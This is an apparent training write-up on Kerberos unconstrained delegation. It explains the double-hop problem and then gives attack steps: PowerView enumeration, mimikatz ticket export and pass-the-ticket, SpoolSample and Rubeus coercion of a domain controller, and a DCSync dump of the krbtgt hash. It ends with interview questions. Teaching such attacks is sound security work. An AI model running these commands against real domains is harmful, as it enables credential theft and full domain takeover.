Unconstrained Delegation

Double hop issue

Application and data access configurations often require fine-grained permissions, which can create design issues and security misconfigurations. One classic example of this lies in the Kerberos protocol and its authentication mechanism.

For example, consider an internal web server application that is only available to company employees. This web application uses Windows Authentication and retrieves data from a backend database. In this scenario, the web application should only be able to access data from the database server if the user accessing the web application has appropriate access according to Active Directory group membership.

Kerberos does not directly provide a way to accomplish this. When the web application uses Kerberos authentication, it is only presented with the user’s service ticket. This service ticket contains access permissions for the web application, but the web server service account can not use it to access the backend database.

This is known as the Kerberos double-hop issue. Microsoft’s Kerberos delegation solves this design issue and provides a way for the web server to authenticate to the backend database on behalf of the user.

Recap

When a user successfully logs in to a computer, a Ticket Granting Ticket (TGT) is returned. Once the user requests access to a service that uses Kerberos authentication, a Ticket Granting Service ticket (TGS) is generated by the Key Distribution Center (KDC) based on the TGT and returned to the user.

This TGS is then sent to the service, which validates the access. Note that this TGS only allows that specific user to access that specific service. Since the service cannot reuse the TGS to authenticate to a backend service, any Kerberos authentication stops here. Unconstrained delegation solves this with a forwardable TGT.

Kerberos problem again

We begin with an overview of Kerberos authentication

In this case, when a user request access to a service that uses unconstrained delegation, the request also include the forwardable TGT.

Next we are able to send the TGT and the session key into TGS and sends it to the server. Now the frontend service is able to impersonate as us to the backend services.

seems cool solve the double hopping problem.

SO WHY THIS CAUSE PROBLEMS?

Frontend service stores all the tickets into LSASS(Local security Authority Subsystem Service). So it can impersonate authentication to ANY service(Its unconstrained delegation, if its constrained delegation it will only able to access for specific service).

In the event when this frontend is being compromised, attacker is able to dump the memory to retrieve the hashes and impersonate the users and authentication to any services.

Attack

Enumeration

We can enumerate using the PowerView and search in AD which of the workstation has the attribute useraccountcontrol set as "TRUSTED_FOR_DELEGATION"

get-netcomputer -unconstrained

In this screenshot we found the station web.cyberrange.com have the attribute TRUSTED_FOR_DELEGATION

Dump for the tickets in memory

mimikatz# privilege::debug
mimikatz# sekurlsa::tickets /export

This will dump all the ticket out the memoies and pick one of the desied TGT and inject into memory usingkerberos::ptt

mimikatz # sekurlsa::tickets /export
...
Group 2 - Ticket Granting Ticket
[00000000]
 Start/End/MaxRenew: 4/13/2020 5:14:40 AM ; 4/13/2020 3:11:20 PM ; 4/20/2020 5:11:20
AM
 Service Name (02) : krbtgt ; PROD.CORP1.COM ; @ PROD.CORP1.COM
 Target Name (--) : @ PROD.CORP1.COM
 Client Name (01) : admin ; @ PROD.CORP1.COM
 Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ;
forwardable ;
 Session Key : 0x00000012 - aes256_hmac
 517cd6b29bac62711b184487d095507c5231b9d921fa7ae8c52a475edf721474
 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
 * Saved to file [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi !
...
mimikatz # kerberos::ptt [0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi
* File: '[0;9eaea]-2-0-60a10000-admin@krbtgt-PROD.CORP1.COM.kirbi': OK

What if domain controller didnt visit the web service?

Its normal that domain controller wont visit the web service(Why would he?).

We could trick a Print server to automatically login against it saving a TGT in the memory of the server. Then, the attacker could perform a Pass the Ticket attack to impersonate the user Print server computer account.

To make a print server login against any machine you can use SpoolSample

In order to receive the tickets once it force authenticated to us, directly setup a Rebeus monitor session listening for the tickets. Since we are forcing the DC, we should indicate the machine name of the DC(AD1$ in this case)

Rubeus

Now we using spoolSample to perform force authentication.

SpoolSample

now switch back to the Rubeus windows, we should receive a ticket from AD1$ with flags forwardable

Use the same ways as above, either use rubeus or use mimikatz to inject the ticket into memory.

mimikatz # lsadump::dcsync /domain:cyberrange.com /user:cyberrange.com\krbtgt

and dumping the krbtgt hash out from DC.

Video demo

90MB

Gitbook.mp4

Author

Ik0nw

Interview question

1) Explain the Kerberos double-hop issue and how unconstrained delegation solves it.

2) How to configure unconstrained delegation in AD ?

3) What are the security risks associated with unconstrained delegation?

4) If we are using powerview, what command you can issue to find potential unconstrained delegation?

5) Why domain controller have "TRUSTED_FOR_DELEGATION" attribute set?

6) Any mitigations?